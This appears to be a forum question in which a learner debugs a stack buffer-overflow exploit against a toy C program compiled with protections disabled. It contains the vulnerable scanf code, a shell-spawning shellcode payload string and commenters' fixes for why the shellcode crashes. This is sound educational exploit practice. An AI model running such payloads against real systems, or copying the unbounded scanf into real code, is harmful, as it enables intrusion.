# Shellcode execution segfault

Tags: linux, elf, exploit, shellcode

I have been trying to exploit simple buffer overflow caused by scanf. I'm working on x86 Linux. The point is to spawn a shell. I sucesfully overwritten return address and jumped into my shellcode. But when it executes some strange thing occurs that i can't understand. The code that I'am working on is taken from here: https://dhavalkapil.com/blogs/Buffer-Overflow-Exploit/

Compilation: gcc -fno-stack-protector -z execstack -o vuln vuln.c -m32

ASLR is disabled too.
Code:

```
#include <stdio.h>

void secretFunction()
{
    printf("Congratulations!\n");
    printf("You have entered in the secret function!\n");
}

void echo()
{
    char buffer[20];

    printf("Enter some text:\n");
    scanf("%s", buffer);
    printf("You entered: %s\n", buffer);    
}

int main()
{
    echo();

    return 0;
}
```

I try to exploit it using this payload:
python -c "print '\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x53\x89\xe1\xB0\xFF\x34\xF4\xCD\x80' + '\x41' * 3 + '\x42' * 4+ '\x8c\xd6\xff\xff' "
shellcode(25) + padding(3) + ebp(4) + return(4)
Where the last part is return address. It succesfully jumps to my shellcode.

Here is the assembly view of shellcode (after returning to overwritten address). I step instructions one by one up to mov %esp, %ecx(0xffffd69d)

[image]

[image]

And then when i try to execute mov %esp, %ecx it goes one byte too close. EIP should point 0xffffd69f but it doesn't.

[image]

I tested shellcode separately and it worked.

```
int main()
{
    char buf[] = "\x31\xC0\x50\x68\x2F\x2F\x73\x68\x68\x2F\x62\x69\x6E\x89\xE3\x50\x53\x89\xe1\xB0\xFF\x34\xF4\xCD\x80";
    ((void (*)())(buf))();
    return 0;
}
```

What I did wrong that it doesnt't work?

EDIT:
Had to update all pictures,
Registers dump before 'mov %esp,%ecx'

[image]

Comment: Could you post register dump at 0xffffd66d?

Comment: It looks like you are overwriting your stack. Similar issue (if not a dup even): https://reverseengineering.stackexchange.com/a/18508/18014

Comment: did you solve this problem ???

Comment: Probably the shellcode is on the stack and you do some push/pop's and overwrite some part of it. Adding something like `sub esp, 0x78` to the start of the shellcode should solve the problem